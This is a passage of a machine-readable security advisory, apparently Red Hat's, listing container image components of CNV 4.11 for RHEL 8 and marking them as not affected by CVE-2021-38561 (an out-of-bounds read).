"container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", product_id: "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", product_identification_helper: { purl: "pkg:oci/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-network-latency-checkup&tag=v4.11.0-67", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", }, product_reference: "container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", }, product_reference: "container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", }, product_reference: "container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", }, product_reference: "container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", }, product_reference: "container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", }, product_reference: "container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", }, product_reference: "container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", }, product_reference: "container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", }, product_reference: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", }, product_reference: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", }, product_reference: "container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", }, product_reference: "container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", }, product_reference: "container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", }, product_reference: "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", }, product_reference: "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", }, product_reference: "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", }, product_reference: "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", }, product_reference: "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", }, product_reference: "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", }, product_reference: "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", }, product_reference: "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", }, product_reference: "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", }, product_reference: "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", }, product_reference: "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", }, product_reference: "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", }, product_reference: "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", }, product_reference: "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", }, product_reference: "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", }, product_reference: "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", }, product_reference: "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, ], }, vulnerabilities: [ { cve: "CVE-2021-38561", cwe: { id: "CWE-125", name: "Out-of-bounds Read", }, discovery_date: "2022-06-23T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", 